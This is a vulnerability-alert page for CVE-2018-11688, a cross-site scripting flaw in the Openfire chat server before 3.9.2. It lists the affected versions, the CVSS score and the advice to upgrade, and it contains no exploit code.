Monitor vulnerabilities like this one. Sign up free to get alerted when software you use is affected.
6.1

CVE-2018-11688: Openfire Before 3.9.2 Allows Attackers to Steal User Credentials

GHSA-jphj-5g3m-w7x6 CVE-2018-11688
Summary

A bug in Openfire, a popular chat server software, makes it possible for hackers to trick users into revealing their login credentials. If you use Openfire, make sure to update to version 3.9.2 or later to protect your users' sensitive information. This update fixes the issue and prevents attackers from hijacking user sessions.

What to do
  • Update igniterealtime org.igniterealtime.openfire:parent to version 3.9.2.
Affected software
Ecosystem VendorProductAffected versions
maven igniterealtime org.igniterealtime.openfire:parent < 3.9.2
Fix: upgrade to 3.9.2
– igniterealtime openfire 3.7.1
cpe:2.3:a:igniterealtime:openfire:3.7.1:*:*:*:*:*:*:*
Original title
Ignite Realtime Openfire before 3.9.2 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability via a crafted U...
Original description
Ignite Realtime Openfire before 3.9.2 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability via a crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
ghsa CVSS3.1 6.1
Vulnerability type
CWE-79 Cross-site Scripting (XSS)
Published: 13 Jun 2018 · Updated: 15 Jun 2026 · First seen: 6 Mar 2026